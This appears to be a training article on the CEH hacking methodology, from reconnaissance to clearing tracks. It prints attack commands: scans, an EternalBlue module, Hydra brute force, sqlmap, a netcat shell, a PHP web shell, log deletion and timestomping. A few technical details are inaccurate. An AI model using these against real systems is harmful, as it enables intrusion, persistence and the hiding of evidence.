CEH Hacking Methodology (CHM)

CEH Hacking Methodology (CHM)

The Certified Ethical Hacker (CEH) Hacking Methodology provides a structured approach for ethical hackers to identify and exploit vulnerabilities in systems and networks. This methodology not only helps in executing successful penetration tests but also ensures that ethical hackers can provide valuable insights into security improvements. The methodology is composed of several critical phases, each playing a vital role in the overall hacking process.

1. Reconnaissance

Reconnaissance is the first step in the hacking process and serves as the foundation for the rest of the methodology. It involves gathering as much information as possible about the target before any direct interaction. This phase is further divided into two types: passive and active reconnaissance.

Passive Reconnaissance

Passive reconnaissance involves collecting information without directly engaging with the target. This method reduces the risk of detection and can often yield significant information.

  • WHOIS Lookups: WHOIS databases provide information about domain registrations, including ownership, registration dates, and contact details. Tools like whois can be utilized to extract this data.
  • whois target.com
  • Google Dorking: This involves using advanced search queries to locate sensitive information inadvertently exposed by the target. Examples include searching for file types or specific phrases within the target’s site.
  • site:target.com filetype:pdf confidential
  • Social Media Profiling: Platforms like LinkedIn can be leveraged to gather insights into employees, technology stacks, and organizational structures. This information can help in crafting more targeted attacks.

Active Reconnaissance

Active reconnaissance involves direct interaction with the target, which can potentially alert the target's security team. However, it often provides more precise and actionable information.

  • Port Scanning: Tools like Nmap are essential for identifying open ports and the services running on them. A comprehensive scan helps understand the attack surface.
  • nmap -sS -p 1-65535 <target-IP>
  • DNS Enumeration: This process involves querying DNS servers to discover subdomains and IP addresses associated with the target. Tools like dig or dnsenum are commonly used.
  • dig subdomain.target.com
  • Traceroute: This tool helps determine the path packets take to reach the target, revealing potential points of entry and network topology.
  • traceroute target.com

2. Scanning

Scanning is the phase where the hacker validates the information gathered during reconnaissance and identifies potential entry points. This step is crucial in pinpointing vulnerabilities that can be exploited.

Port Scanning

Port scanning is a critical technique that allows ethical hackers to discover open ports on a target system. Each open port can represent a potential vulnerability. Tools like Zmap and Masscan can quickly scan large networks.

masscan -p80 --rate=100000

Vulnerability Scanning

Once the open ports and services are identified, the next step is to scan these services for known vulnerabilities. Tools like Nessus and OpenVAS are widely used for this purpose. These tools provide detailed reports on vulnerabilities and recommend mitigation strategies.

nessus --scan-target=<target-IP>

Banner Grabbing

By connecting to open ports and analyzing service responses, ethical hackers can gather valuable information about the software and its version. This data is critical for identifying known vulnerabilities associated with specific software versions.

nc <target-IP> 80

After connecting, sending an HTTP GET request will often yield a server banner indicating the software type and version.

3. Gaining Access

This phase is where the ethical hacker attempts to exploit identified vulnerabilities to gain unauthorized access to the target system. This step is crucial as it confirms the existence of vulnerabilities and provides insight into how they can be exploited.

Exploitation Frameworks

Frameworks like Metasploit offer a vast library of exploits that can be used against known vulnerabilities. The ease of use and extensive database make Metasploit a favorite among ethical hackers.

use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target-IP>

Password Cracking

Exploiting weak passwords is a common tactic. Tools like Hydra and John the Ripper can be used to automate password cracking through brute force or dictionary attacks.

hydra -l admin -P rockyou.txt ssh://<target-IP>

Web Application Exploits

SQL Injection (SQLi) is one of the most prevalent web application vulnerabilities. Tools like sqlmap can automate the detection and exploitation of SQLi vulnerabilities.

sqlmap -u "http://target.com/vulnerable.php?id=1" --dbs

4. Maintaining Access

Once access has been gained, maintaining that access is critical for further exploitation. This phase ensures that the ethical hacker can return to the compromised system at will, even if the initial vulnerability is patched.


Establishing a backdoor allows for persistent access. Tools like Netcat can be used to create a reverse shell that connects back to the hacker's system.

nc -lvp 4444 -e /bin/bash


Rootkits are stealthy tools used to hide the presence of malicious software. They operate at a low level in the operating system, making detection difficult. Tools like Cheat Engine and Rootkit Revealer help attackers maintain control.

Web Shells

Uploading a web shell, such as Wso.php, to a compromised web server allows attackers to execute commands remotely.

<?php system($_GET['cmd']); ?>

This script executes commands passed through the URL parameter, allowing for remote control of the server.

5. Clearing Tracks

After compromising a system, clearing tracks is vital to avoid detection. This phase involves erasing evidence of the attack to make it difficult for administrators to trace the actions taken by the attacker.

Log Manipulation

Altering or deleting logs is a common tactic to erase traces of unauthorized access. Using tools like logcleaner or commands such as:

sed -i '/suspicious-entry/d' /var/log/auth.log


Changing file timestamps can mislead forensic investigations. Tools like Timestomp can modify the creation and modification timestamps of files.

timestomp <file> -c

Removing Malicious Software

Finally, removing backdoors and malware from the system ensures that the attacker’s presence remains undetected. Tools like BCWipe can securely delete files beyond recovery:

bcwipe -r /path/to/directory

Real-World Example of CHM in Action

The Target Breach of 2013 is a prominent example of the hacking methodology in action. Attackers used phishing techniques to collect credentials from a third-party vendor. They then scanned Target's network for vulnerabilities, ultimately exploiting weak security in Target's POS systems to gain access. The attackers deployed malware to maintain access, stealing millions of customer records. The breach went undetected for weeks, showcasing how critical each phase of the CEH methodology is in real-world scenarios.


The CEH Hacking Methodology is an essential framework for ethical hackers, providing a structured approach to identify, exploit, and mitigate vulnerabilities. By following these phases, ethical hackers can effectively assess the security posture of an organization and help implement necessary improvements to safeguard against potential threats. As cyber threats continue to evolve, understanding and applying this methodology will remain crucial for security professionals.


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